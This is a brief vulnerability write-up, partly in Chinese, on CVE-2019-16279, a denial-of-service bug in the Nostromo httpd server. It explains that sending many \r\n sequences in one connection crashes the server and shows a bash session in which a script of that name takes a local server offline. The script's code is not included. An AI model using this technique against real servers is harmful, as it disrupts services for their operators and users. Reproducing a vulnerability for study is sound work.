# CVE-2019-16279 Nostromo httpd dos
### 一、漏洞简介
(CVE-2019-16279)dos
### 二、影响范围
### 三、复现过程
This bug exploit a memory error when sending too many \r\n in a single connexion.
Example
```bash
$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused
```